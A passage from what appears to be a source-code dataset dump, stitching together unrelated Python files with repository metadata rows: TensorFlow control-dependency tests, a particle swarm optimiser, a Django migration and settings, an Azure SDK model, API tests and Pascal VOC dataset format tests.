def testVariableWriteInNestedFunction(self):
def build_functional_op(v):
@def_function.function
def fn_with_write():
@def_function.function
def inner_fn():
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return inner_fn()
return fn_with_write()
self._testVariableWriteInFunctionalOp(build_functional_op,
"StatefulPartitionedCall")
def testVariableWriteInWhileInInnerFunc(self):
def build_functional_op(v):
@def_function.function
def fn_with_write():
@def_function.function
def inner_fn():
def body(_):
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return control_flow_ops.while_loop(
lambda i: True, body, [0.0], maximum_iterations=1)
return inner_fn()
return fn_with_write()
self._testVariableWriteInFunctionalOp(build_functional_op,
"StatefulPartitionedCall")
def testVariableWriteInCondInInnerFunc(self):
def build_functional_op(v):
@def_function.function
def fn_with_write():
@def_function.function
def inner_fn():
def then_branch():
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
def else_branch():
return array_ops.zeros([], v.dtype)
return control_flow_ops.cond(
constant_op.constant(True), then_branch, else_branch)
return inner_fn()
return fn_with_write()
self._testVariableWriteInFunctionalOp(build_functional_op,
"StatefulPartitionedCall")
@test_util.run_v1_only("b/120545219")
def testCondMustRun(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
p = array_ops.placeholder(dtype=dtypes.bool)
with acd.AutomaticControlDependencies() as c:
def true_fn():
v.assign(v + 1)
return 0.0
def false_fn():
v.assign(v + 4)
return 1.0
control_flow_ops.cond(p, true_fn, false_fn)
val = v.read_value()
val = c.mark_as_return(val)
self.assertAllEqual(val.eval(feed_dict={p: False}), 5.0)
self.assertAllEqual(val.eval(feed_dict={p: True}), 6.0)
@test_util.run_v1_only("b/120545219")
def testCondMustRunSeparateRead(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
p = array_ops.placeholder(dtype=dtypes.bool)
with acd.AutomaticControlDependencies() as c:
def true_fn():
v.assign(v + 1)
return 0.0
def false_fn():
v.assign(v + 4)
return 1.0
control_flow_ops.cond(p, true_fn, false_fn)
one = constant_op.constant(1.0)
one = c.mark_as_return(one)
one.eval(feed_dict={p: False})
self.assertAllEqual(v.read_value(), 5.0)
one.eval(feed_dict={p: True})
self.assertAllEqual(v.read_value(), 6.0)
@test_util.run_v1_only("b/120545219")
def testCondNested(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
p = array_ops.placeholder(dtype=dtypes.bool)
q = array_ops.placeholder(dtype=dtypes.bool)
with acd.AutomaticControlDependencies() as c:
def true_fn():
v.assign(v + 1, name="true")
return 1.0
def false_fn():
def inner_true_fn():
v.assign(v * 2, name="false_true")
return 2.0
def inner_false_fn():
v.assign(v * 3, name="false_false")
return 3.0
control_flow_ops.cond(q, inner_true_fn, inner_false_fn)
return 1.0
control_flow_ops.cond(p, true_fn, false_fn)
with ops.name_scope("final"):
val = v.read_value()
val = c.mark_as_return(val)
self.assertAllEqual(val.eval(feed_dict={p: False, q: False}), 3.0)
self.assertAllEqual(val.eval(feed_dict={p: False, q: True}), 6.0)
self.assertAllEqual(val.eval(feed_dict={p: True, q: True}), 7.0)
self.assertAllEqual(val.eval(feed_dict={p: True, q: False}), 8.0)
@test_util.run_v1_only("b/120545219")
def testCondOneBranch(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
p = array_ops.placeholder(dtype=dtypes.bool)
with acd.AutomaticControlDependencies() as c:
def true_fn():
return 0.0
def false_fn():
v.assign(v + 4)
return 1.0
control_flow_ops.cond(p, true_fn, false_fn)
val = v.read_value()
val = c.mark_as_return(val)
self.assertAllEqual(val.eval(feed_dict={p: False}), 5.0)
self.assertAllEqual(val.eval(feed_dict={p: True}), 5.0)
@test_util.run_v1_only("b/120545219")
def testCondOneBranchUpdateBefore(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
p = array_ops.placeholder(dtype=dtypes.bool)
with acd.AutomaticControlDependencies() as c:
v.assign(v * 2)
def true_fn():
return 0.0
def false_fn():
v.assign(v + 4)
return 1.0
control_flow_ops.cond(p, true_fn, false_fn)
val = v.read_value()
val = c.mark_as_return(val)
self.assertAllEqual(val.eval(feed_dict={p: False}), 6.0)
self.assertAllEqual(val.eval(feed_dict={p: True}), 12.0)
@test_util.run_v1_only("b/120545219")
def testCondOneBranchUpdateAfter(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
p = array_ops.placeholder(dtype=dtypes.bool)
with acd.AutomaticControlDependencies() as c:
def true_fn():
return 0.0
def false_fn():
v.assign(v + 4)
return 1.0
control_flow_ops.cond(p, true_fn, false_fn)
v.assign(v * 2)
val = v.read_value()
val = c.mark_as_return(val)
self.assertAllEqual(val.eval(feed_dict={p: False}), 10.0)
self.assertAllEqual(val.eval(feed_dict={p: True}), 20.0)
def testDefunWhileLoopWithCapturedLoopVars(self):
n = 3
x = constant_op.constant(list(range(n)))
@function.defun
def loop():
c = lambda i, x: i < n
b = lambda i, x: (i + 1, x + 1)
i, out = control_flow_ops.while_loop(c, b, (0, x))
return i, out
i, out = loop()
self.assertEqual(int(i), 3)
self.assertAllEqual(out, [3, 4, 5])
def testDecorator(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
@acd.automatic_control_dependencies
def f():
v.assign(v + 1)
v.assign(2 * v)
return v.read_value()
self.assertAllEqual(f(), 4.0)
def testOptimizerInDefun(self):
def loss(v):
return v**2
optimizer = momentum.MomentumOptimizer(learning_rate=1.0, momentum=1.0)
@function.defun
def train():
self.v = resource_variable_ops.ResourceVariable(1.0)
grad = backprop.implicit_grad(loss)(self.v)
optimizer.apply_gradients(grad)
return self.v.read_value()
value = train()
self.assertEqual(value.numpy(), -1.0)
def testReturningNonTensorRaisesError(self):
optimizer = momentum.MomentumOptimizer(learning_rate=1.0, momentum=1.0)
optimizer.apply_gradients = function.defun(optimizer.apply_gradients)
v = resource_variable_ops.ResourceVariable(1.0)
grad = backprop.implicit_grad(lambda v: v**2)(v)
with self.assertRaisesRegex(TypeError,
".*must return zero or more Tensors.*"):
# TODO(akshayka): We might want to allow defun-ing Python functions
# that return operations (and just execute the op instead of running it).
optimizer.apply_gradients(grad)
# TODO(b/111663004): This should work when the outer context is graph
# building.
def testOptimizerNonSlotVarsInDefunNoError(self):
def loss(v):
return v**2
optimizer = adam.AdamOptimizer(learning_rate=1.0)
@function.defun
def train():
self.v = resource_variable_ops.ResourceVariable(1.0)
grad = backprop.implicit_grad(loss)(self.v)
optimizer.apply_gradients(grad)
return self.v.read_value()
train()
def testOptimizerInDefunWithCapturedVariable(self):
v = resource_variable_ops.ResourceVariable(1.0)
def loss():
return v**2
optimizer = momentum.MomentumOptimizer(learning_rate=1.0, momentum=1.0)
@function.defun
def train():
grad = backprop.implicit_grad(loss)()
optimizer.apply_gradients(grad)
train()
self.assertEqual(v.numpy(), -1.0)
def testRepeatedResourceInput(self):
var = resource_variable_ops.ResourceVariable(1.0)
@def_function.function
def inner(var1, var2):
return (resource_variable_ops.read_variable_op(var1, dtypes.float32) +
resource_variable_ops.read_variable_op(var2, dtypes.float32))
@def_function.function
def outer():
return inner(var.handle, var.handle)
self.assertEqual(self.evaluate(outer()), 2.0)
if __name__ == "__main__":
ops.enable_eager_execution()
test.main()
| [
"[email protected]"
] | |
32aa5d9cac9deb1adfdf09a485151fce534ecd73 | a3f3c625af98882a7f1775de1e6187f1ead4e32b | /playground/swarm/pso.py | 0fa9e4d29e75bad2e8c5e50770db40f8b8c213ee | [
"MIT"
] | permissive | StanJBrown/playground | e0846986af5939be77ee561794b5bd0c94a37c28 | f372c3c547d0ad34f9bdffaa2b2e93d089a3f5a4 | refs/heads/master | 2020-07-01T11:45:45.410104 | 2014-12-12T19:19:39 | 2014-12-12T19:19:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,542 | py | #!/usr/bin/env python2
import os
import sys
import time
from random import random
from random import uniform
sys.path.append(os.path.join(os.path.dirname(__file__), "../../"))
import matplotlib.pylab as plt
from playground.population import Population
class PSOParticle(object):
def __init__(self, **kwargs):
self.score = kwargs.get("score", None)
self.best_score = self.score
self.position = kwargs.get("position", None)
self.best_position = self.position
self.velocity = kwargs.get("velocity", None)
self.bounds = kwargs.get("bounds", None)
self.max_velocity = kwargs.get("max_velocity", None)
def update_velocity(self, best, c_1, c_2):
if self.max_velocity is None:
raise RuntimeError("max_velocity is None!")
# loop through each dimension
for i in range(len(self.position)):
# calcuate cognitive and social components
cog = c_1 * random() * (self.best_position[i] - self.position[i])
soc = c_2 * random() * (best.best_position[i] - self.position[i])
# update velocity
self.velocity[i] = self.velocity[i] + cog + soc
# if velocity reaches max, cap the velocity
if self.velocity[i] > self.max_velocity[i]:
self.velocity[i] = self.max_velocity[i]
elif self.velocity[i] < -self.max_velocity[i]:
self.velocity[i] = -self.max_velocity[i]
def check_over_bounds(self):
if self.bounds is None:
raise RuntimeError("bounds is None!")
# loop through each dimension
for i in range(len(self.bounds)):
# get min and max boundary for i-th dimension
min_bound = self.bounds[i][0]
max_bound = self.bounds[i][1]
# check for over the boundary
if self.position[i] > max_bound:
diff = abs(self.position[i] - max_bound)
self.position[i] = max_bound - diff
self.velocity[i] *= -1.0 # reverse direction
# check for under the boundary
elif self.position[i] < min_bound:
diff = abs(self.position[i] - min_bound)
self.position[i] = min_bound + diff
self.velocity[i] *= -1.0 # reverse direction
def update_position(self):
# loop through each dimension
for i in range(len(self.position)):
# update position
self.position[i] = self.position[i] + self.velocity[i]
# check if over bounds
self.check_over_bounds()
def update_best_position(self):
if self.score < self.best_score:
self.best_score = self.score
self.best_position = self.position
class PSOParticleGenerator(object):
def __init__(self, config):
self.config = config
self.bounds = config.get("bounds", None)
self.max_velocity = config.get("max_velocity", None)
self.obj_func = config.get("objective_function", None)
def random_velocity_vector(self):
if self.max_velocity is None:
raise RuntimeError("max velocity is None!")
random_vector = []
for i in range(len(self.max_velocity)):
            min_bound = -self.max_velocity[i]
            max_bound = self.max_velocity[i]
random_num = uniform(min_bound, max_bound)
random_vector.append(random_num)
return random_vector
def random_position_vector(self):
if self.bounds is None:
raise RuntimeError("bounds is None!")
random_vector = []
for i in range(len(self.bounds)):
min_bound = self.bounds[i][0]
max_bound = self.bounds[i][1]
random_num = uniform(min_bound, max_bound)
random_vector.append(random_num)
return random_vector
def create_particle(self):
if self.obj_func is None:
raise RuntimeError("obj_func is None!")
particle = PSOParticle()
# position
particle.position = self.random_position_vector()
particle.best_position = particle.position
# velocity
particle.velocity = self.random_velocity_vector()
# score
particle.score = self.obj_func(particle.position)
particle.best_score = particle.score
# boundaries for position and velocity
particle.bounds = self.bounds
particle.max_velocity = self.max_velocity
return particle
def init(self):
population = Population(self.config)
for i in range(self.config["max_population"]):
particle = self.create_particle()
population.individuals.append(particle)
return population
def pso_search(population, config):
obj_func = config["objective_function"]
gbest = population.find_best_individuals()[0]
max_generations = config["max_generations"]
c_1 = config["c_1"]
c_2 = config["c_2"]
# search loop
for gen in range(max_generations):
# update particles
for particle in population.individuals:
particle.update_velocity(gbest, c_1, c_2)
particle.update_position()
particle.score = obj_func(particle.position)
particle.update_best_position()
# update global best
population.sort_individuals()
gen_best = population.find_best_individuals()[0]
if gen_best.score < gbest.score:
gbest = PSOParticle(
score=gen_best.score,
position=list(gen_best.position),
velocity=list(gen_best.velocity),
bounds=gen_best.bounds,
max_velocity=gen_best.max_velocity
)
# print
print " > gen {0}, fitness={1}".format(gen, gbest.score)
# display animation
if config.get("animate", False):
# pre-check
if len(config["bounds"]) > 2:
raise RuntimeError("Animate does not support > 2 dimensions!")
# animate swarm
x = [p.position[0] for p in population.individuals]
y = [p.position[1] for p in population.individuals]
plt.clf() # clear figure
plt.scatter(x, y)
plt.xlim(config["bounds"][0])
plt.ylim(config["bounds"][1])
plt.draw()
plt.show(block=False)
time.sleep(config.get("animation_frame_delay", 0.1))
return (gbest.position, gbest.score)
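
# --- Usage sketch (illustrative addition, not part of the original module).
# --- The sphere objective and the concrete parameter values are assumptions;
# --- the config keys match the ones read by the classes above, and the
# --- Population API is assumed to behave as it is used in pso_search.
if __name__ == "__main__":
    def sphere(position):
        # simple convex test function with its minimum at the origin
        return sum(x ** 2 for x in position)

    config = {
        "max_population": 30,
        "max_generations": 50,
        "c_1": 2.0,  # cognitive coefficient
        "c_2": 2.0,  # social coefficient
        "bounds": [[-5.0, 5.0], [-5.0, 5.0]],
        "max_velocity": [1.0, 1.0],
        "objective_function": sphere,
        "animate": False,
    }

    swarm = PSOParticleGenerator(config).init()
    best_position, best_score = pso_search(swarm, config)
    print("best score: {0} at {1}".format(best_score, best_position))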
| [
"[email protected]"
] | |
45a709071d8ec420e128a6a4db0795c863d79579 | 2cfcc435d82455e5273c2643092cda8f641e1f50 | /portfolio/migrations/0023_auto_20190712_1402.py | 675aaabf9c944f9b8d63bcd81494b2c0faf5c96a | [] | no_license | iAnafem/My_website | bdc8804bfe099e095faa96233d138278d9a8f11b | 6cb1498809ef2027b419960544c8101649cb5c89 | refs/heads/master | 2022-12-09T15:23:32.717676 | 2019-08-22T20:03:45 | 2019-08-22T20:03:45 | 187,834,896 | 0 | 0 | null | 2022-12-08T05:51:02 | 2019-05-21T12:41:47 | Python | UTF-8 | Python | false | false | 408 | py | # Generated by Django 2.2.3 on 2019-07-12 11:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('portfolio', '0022_auto_20190712_1357'),
]
operations = [
migrations.AlterField(
model_name='projectimages',
name='description',
field=models.TextField(blank=True, null=True),
),
]
| [
"[email protected]"
] | |
1e7986478e8ef71cc2aa8e795af6d16af4a20b41 | 287a10a6f28517003728aebbd7ed097af13a8d18 | /exp_170508_after_bug_fix_in_mc/create_border_contact_figure.py | 8987102c8da185cc105167ad1679624f50405007 | [] | no_license | jhennies/nmmp_experiments | 05c78c6068fa0f6df0002e57529cd7b8d1daa456 | 7c06a5818a5176fa0dc17a42ba22b2262239d91d | refs/heads/master | 2021-04-06T12:01:25.537695 | 2017-09-22T13:42:51 | 2017-09-22T13:42:51 | 83,289,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,000 | py |
from multicut_src.false_merges.compute_border_contacts import compute_border_contacts_old
from multicut_src import load_dataset
import os
import vigra
from multicut_src import ExperimentSettings
from pipeline import find_false_merges
# TODO Change here
from init_exp_splB_z0 import meta_folder, project_folder, source_folder, experiment_folder
from run_mc_splB_z0 import result_key
# Path folders
test_paths_cache_folder = os.path.join(meta_folder, 'path_data')
train_paths_cache_folder = os.path.join(project_folder, 'train_paths_cache')
if __name__ == '__main__':
# TODO Change here
from init_exp_splB_z0 import test_name
from run_mc_splB_z0 import rf_cache_folder
test_seg_filepath = experiment_folder + 'result.h5'
seg = vigra.readHDF5(test_seg_filepath, 'z/0/data')[0: 300, 0:300, :]
ds_test = load_dataset(meta_folder, test_name)
from matplotlib import pyplot as plt
dt = ds_test.inp(2)[0: 300, 0:300, :]
compute_border_contacts_old(seg, dt)
| [
"[email protected]"
] | |
1507896221705c44fb7ce9ab7818ac2b66f65fd7 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02682/s859546484.py | cba7ac8502d2fc8816e0d58c1f99f1e9a8ff57f7 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | A, B, C, K = map(int, input().split())
if (K - A) > 0:
    Y = K - A  # cards still to pick after taking every +1 card
else:
    print(K)  # K <= A: all K picked cards are worth +1
    exit()
if (Y - B) > 0:
    Z = Y - B  # picks that must come from the -1 cards
else:
    Z = 0  # the 0-valued cards absorb the remaining picks
X = A + 0 * Y + (-1) * Z  # all +1s, some 0s, and Z forced -1s
print(X)
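# Worked check (illustrative): A=2, B=1, C=1, K=3 -> Y=1, Z=0, X=2
# (take both +1 cards and the 0). A=1, B=1, C=1, K=3 -> Y=2, Z=1, X=0.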
| [
"[email protected]"
] | |
d664c90d8aebc67f3b56264fc249bd376fb266fe | efb1eb654d3477b411f82f83762796372b5c803b | /src/config/django/__init__.py | e2581d7f443403883d115c08422b6f43ce23640a | [
"MIT"
] | permissive | Rydra/mastermind-api | d9bcc6857fe4e3ad2a77560babd64a5d8ded59b7 | 850963b472644dd66b042223ffd86726af60bcda | refs/heads/master | 2023-02-22T03:10:49.589415 | 2022-12-29T14:37:08 | 2022-12-29T14:37:08 | 192,472,100 | 0 | 0 | MIT | 2023-02-15T20:28:40 | 2019-06-18T05:33:59 | Python | UTF-8 | Python | false | false | 161 | py | from split_settings.tools import include
from config.settings import Settings
settings = Settings()
ENVIRONMENT = settings.env
# merge the split settings files in order (later files override earlier ones)
include("base.py", "local.py")
| [
"[email protected]"
] | |
d553a694c1bc0ece302e0020fb2752ee528044af | c1bd12405d244c5924a4b069286cd9baf2c63895 | /azure-mgmt-monitor/azure/mgmt/monitor/models/diagnostic_settings_resource_collection.py | 396b3e7b7afb2b9f28ec3a523a1fe743d47e6fbd | [
"MIT"
] | permissive | lmazuel/azure-sdk-for-python | 972708ad5902778004680b142874582a284a8a7c | b40e0e36cc00a82b7f8ca2fa599b1928240c98b5 | refs/heads/master | 2022-08-16T02:32:14.070707 | 2018-03-29T17:16:15 | 2018-03-29T17:16:15 | 21,287,134 | 1 | 3 | MIT | 2019-10-25T15:56:00 | 2014-06-27T19:40:56 | Python | UTF-8 | Python | false | false | 1,040 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class DiagnosticSettingsResourceCollection(Model):
"""Represents a collection of alert rule resources.
:param value: The collection of diagnostic settings resources;.
:type value: list[~azure.mgmt.monitor.models.DiagnosticSettingsResource]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[DiagnosticSettingsResource]'},
}
def __init__(self, **kwargs):
super(DiagnosticSettingsResourceCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
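# Usage sketch (illustrative addition, not part of the generated SDK file;
# the wrapped DiagnosticSettingsResource instances are assumptions):
# collection = DiagnosticSettingsResourceCollection(value=[settings_resource])
# for resource in collection.value or []:
#     print(resource)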
| [
"[email protected]"
] | |
d0f861cc95b97c0247df14a8af581cee071c46e6 | 3dfb2fcf1236eebc1e306ec6c071a8b02441c597 | /tests/test_api.py | 6c9544f2816beb6bddcc947a280d3b981569de14 | [
"Apache-2.0"
] | permissive | pombredanne/bowl | fdb10e2b824246adcdced718d5eded10ba840c33 | 3f7765a85c9b2954f7d40f919f18573f24a46580 | refs/heads/master | 2021-01-16T17:58:23.241810 | 2014-12-24T06:46:18 | 2014-12-24T06:46:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,719 | py | """
This module is the test suite of the API for bowl.
Created on 27 July 2014
@author: Charlie Lewis
"""
import os
import pkg_resources
import requests
import sys
from bowl import api
class Object(object):
pass
class TestClass:
"""
This class is responsible for all tests in the API.
"""
def start_server(self):
path = os.path.dirname(api.__file__)
child_pid = os.fork()
pid = -1
if child_pid == 0:
# child process
os.chdir(path)
api.main()
else:
pid = child_pid
return pid
def stop_server(self, child_pid):
if child_pid:
os.kill(int(child_pid), 9)
def test_setup(self):
a = api.main().__new__(api.main)
a.setup()
assert 1
def test_root(self):
a = api.root()
a.GET()
assert 1
def test_add(self):
a = api.api_add()
a.POST()
assert 1
def test_connect(self):
a = api.api_connect()
a.GET("host")
assert 1
def test_delete(self):
a = api.api_delete()
a.GET("test")
assert 1
def test_disconnect(self):
a = api.api_disconnect()
a.GET("host")
assert 1
def test_hosts(self):
a = api.api_hosts()
a.GET()
assert 1
def test_image_import(self):
a = api.api_image_import()
a.POST()
assert 1
def test_images(self):
a = api.api_images()
a.GET()
assert 1
def test_info(self):
a = api.api_info()
a.GET()
assert 1
def test_kill(self):
a = api.api_kill()
a.GET("container")
assert 1
def test_link(self):
a = api.api_link()
a.GET("repository")
assert 1
def test_list(self):
a = api.api_list()
a.GET()
assert 1
def test_login(self):
a = api.api_login()
a.POST()
assert 1
def test_logout(self):
a = api.api_logout()
a.POST()
assert 1
def test_logs(self):
a = api.api_logs()
a.GET("container")
assert 1
def test_new(self):
a = api.api_new()
a.POST()
assert 1
def test_remove(self):
a = api.api_remove()
a.POST()
assert 1
def test_repositories(self):
a = api.api_repositories()
a.GET()
assert 1
def test_repo_services(self):
a = api.api_repo_services()
a.GET()
assert 1
def test_services(self):
a = api.api_services()
a.GET()
assert 1
def test_snapshot(self):
a = api.api_snapshot()
a.GET("container")
assert 1
def test_snapshots(self):
a = api.api_snapshots()
a.GET()
assert 1
def test_subtract(self):
a = api.api_subtract()
a.GET("os", "version", "type", "name")
assert 1
def test_test(self):
# !! TODO make sure this isn't recursive
a = api.api_test()
a.GET()
assert 1
def test_unlink(self):
a = api.api_unlink()
a.GET("repository")
assert 1
def test_uptime(self):
a = api.api_uptime()
a.GET()
assert 1
def test_version(self):
a = api.api_version()
# !! TODO not working with travis for some reason
#a.GET()
#child_pid = self.start_server()
#response = requests.get('http://localhost:8080/version')
#version = pkg_resources.get_distribution("bowl").version
#self.stop_server(child_pid)
#assert response.text == version
assert 1
| [
"[email protected]"
] | |
85f3359e9fb29b9c128520c9c5bbd5763fe522d9 | 04b245c8fb6bb09eeb6d8ee962f924d656b4292e | /datumaro/tests/test_voc_format.py | de58ce40ce4f90028f8cc4dba27f13778a0ca0e0 | [
"MIT"
] | permissive | researchapps/cvat | 11b57a59bd6fdca1f899c744526035b43f9f3891 | eb896a1bdd69e5b624b1178c3dc203d95e787dfe | refs/heads/develop | 2020-12-22T15:43:51.072769 | 2020-03-01T19:27:53 | 2020-03-01T19:27:53 | 236,845,460 | 1 | 1 | NOASSERTION | 2020-03-01T18:46:22 | 2020-01-28T21:26:33 | null | UTF-8 | Python | false | false | 23,978 | py | import cv2
import numpy as np
import os
import os.path as osp
from xml.etree import ElementTree as ET
import shutil
from unittest import TestCase
from datumaro.components.extractor import (Extractor, DatasetItem,
AnnotationType, BboxObject, LabelCategories,
)
import datumaro.components.formats.voc as VOC
from datumaro.components.extractors.voc import (
VocClassificationExtractor,
VocDetectionExtractor,
VocSegmentationExtractor,
VocLayoutExtractor,
VocActionExtractor,
)
from datumaro.components.converters.voc import (
VocConverter,
VocClassificationConverter,
VocDetectionConverter,
VocLayoutConverter,
VocActionConverter,
VocSegmentationConverter,
)
from datumaro.components.importers.voc import VocImporter
from datumaro.components.project import Project
from datumaro.util import find
from datumaro.util.test_utils import TestDir
class VocTest(TestCase):
def test_colormap_generator(self):
reference = np.array([
[ 0, 0, 0],
[128, 0, 0],
[ 0, 128, 0],
[128, 128, 0],
[ 0, 0, 128],
[128, 0, 128],
[ 0, 128, 128],
[128, 128, 128],
[ 64, 0, 0],
[192, 0, 0],
[ 64, 128, 0],
[192, 128, 0],
[ 64, 0, 128],
[192, 0, 128],
[ 64, 128, 128],
[192, 128, 128],
[ 0, 64, 0],
[128, 64, 0],
[ 0, 192, 0],
[128, 192, 0],
[ 0, 64, 128],
[224, 224, 192], # ignored
])
self.assertTrue(np.array_equal(reference, list(VOC.VocColormap.values())))
def get_label(extractor, label_id):
return extractor.categories()[AnnotationType.label].items[label_id].name
def generate_dummy_voc(path):
cls_subsets_dir = osp.join(path, 'ImageSets', 'Main')
action_subsets_dir = osp.join(path, 'ImageSets', 'Action')
layout_subsets_dir = osp.join(path, 'ImageSets', 'Layout')
segm_subsets_dir = osp.join(path, 'ImageSets', 'Segmentation')
ann_dir = osp.join(path, 'Annotations')
img_dir = osp.join(path, 'JPEGImages')
segm_dir = osp.join(path, 'SegmentationClass')
inst_dir = osp.join(path, 'SegmentationObject')
os.makedirs(cls_subsets_dir)
os.makedirs(ann_dir)
os.makedirs(img_dir)
os.makedirs(segm_dir)
os.makedirs(inst_dir)
subsets = {
'train': ['2007_000001'],
'test': ['2007_000002'],
}
# Subsets
for subset_name, subset in subsets.items():
for item in subset:
with open(osp.join(cls_subsets_dir, subset_name + '.txt'), 'w') as f:
for item in subset:
f.write('%s\n' % item)
shutil.copytree(cls_subsets_dir, action_subsets_dir)
shutil.copytree(cls_subsets_dir, layout_subsets_dir)
shutil.copytree(cls_subsets_dir, segm_subsets_dir)
# Classification
subset_name = 'train'
subset = subsets[subset_name]
for label in VOC.VocLabel:
with open(osp.join(cls_subsets_dir, '%s_%s.txt' % \
(label.name, subset_name)), 'w') as f:
for item in subset:
presence = label.value % 2
f.write('%s %2d\n' % (item, 1 if presence else -1))
# Detection + Action + Layout
subset_name = 'train'
subset = subsets[subset_name]
for item in subset:
root_elem = ET.Element('annotation')
ET.SubElement(root_elem, 'folder').text = 'VOC' + item.split('_')[0]
ET.SubElement(root_elem, 'filename').text = item + '.jpg'
size_elem = ET.SubElement(root_elem, 'size')
ET.SubElement(size_elem, 'width').text = '10'
ET.SubElement(size_elem, 'height').text = '20'
ET.SubElement(size_elem, 'depth').text = '3'
ET.SubElement(root_elem, 'segmented').text = '1'
obj1_elem = ET.SubElement(root_elem, 'object')
ET.SubElement(obj1_elem, 'name').text = VOC.VocLabel(1).name
ET.SubElement(obj1_elem, 'pose').text = VOC.VocPose(1).name
ET.SubElement(obj1_elem, 'truncated').text = '1'
ET.SubElement(obj1_elem, 'difficult').text = '0'
obj1bb_elem = ET.SubElement(obj1_elem, 'bndbox')
ET.SubElement(obj1bb_elem, 'xmin').text = '1'
ET.SubElement(obj1bb_elem, 'ymin').text = '2'
ET.SubElement(obj1bb_elem, 'xmax').text = '3'
ET.SubElement(obj1bb_elem, 'ymax').text = '4'
obj2_elem = ET.SubElement(root_elem, 'object')
ET.SubElement(obj2_elem, 'name').text = VOC.VocLabel.person.name
obj2bb_elem = ET.SubElement(obj2_elem, 'bndbox')
ET.SubElement(obj2bb_elem, 'xmin').text = '4'
ET.SubElement(obj2bb_elem, 'ymin').text = '5'
ET.SubElement(obj2bb_elem, 'xmax').text = '6'
ET.SubElement(obj2bb_elem, 'ymax').text = '7'
obj2head_elem = ET.SubElement(obj2_elem, 'part')
ET.SubElement(obj2head_elem, 'name').text = VOC.VocBodyPart(1).name
obj2headbb_elem = ET.SubElement(obj2head_elem, 'bndbox')
ET.SubElement(obj2headbb_elem, 'xmin').text = '5.5'
ET.SubElement(obj2headbb_elem, 'ymin').text = '6'
ET.SubElement(obj2headbb_elem, 'xmax').text = '7.5'
ET.SubElement(obj2headbb_elem, 'ymax').text = '8'
obj2act_elem = ET.SubElement(obj2_elem, 'actions')
for act in VOC.VocAction:
ET.SubElement(obj2act_elem, act.name).text = '%s' % (act.value % 2)
with open(osp.join(ann_dir, item + '.xml'), 'w') as f:
f.write(ET.tostring(root_elem, encoding='unicode'))
# Segmentation + Instances
subset_name = 'train'
subset = subsets[subset_name]
for item in subset:
cv2.imwrite(osp.join(segm_dir, item + '.png'),
np.ones([10, 20, 3]) * VOC.VocColormap[2])
cv2.imwrite(osp.join(inst_dir, item + '.png'),
np.ones([10, 20, 3]) * VOC.VocColormap[2])
# Test images
subset_name = 'test'
subset = subsets[subset_name]
for item in subset:
cv2.imwrite(osp.join(img_dir, item + '.jpg'),
np.ones([10, 20, 3]))
return subsets
class VocExtractorTest(TestCase):
def test_can_load_voc_cls(self):
with TestDir() as test_dir:
generated_subsets = generate_dummy_voc(test_dir.path)
extractor = VocClassificationExtractor(test_dir.path)
self.assertEqual(len(generated_subsets), len(extractor.subsets()))
subset_name = 'train'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
count = 0
for label in VOC.VocLabel:
if label.value % 2 == 1:
count += 1
ann = find(item.annotations,
lambda x: x.type == AnnotationType.label and \
get_label(extractor, x.label) == label.name)
self.assertFalse(ann is None)
self.assertEqual(count, len(item.annotations))
subset_name = 'test'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
self.assertEqual(0, len(item.annotations))
def test_can_load_voc_det(self):
with TestDir() as test_dir:
generated_subsets = generate_dummy_voc(test_dir.path)
extractor = VocDetectionExtractor(test_dir.path)
self.assertEqual(len(generated_subsets), len(extractor.subsets()))
subset_name = 'train'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
obj1 = find(item.annotations,
lambda x: x.type == AnnotationType.bbox and \
get_label(extractor, x.label) == VOC.VocLabel(1).name)
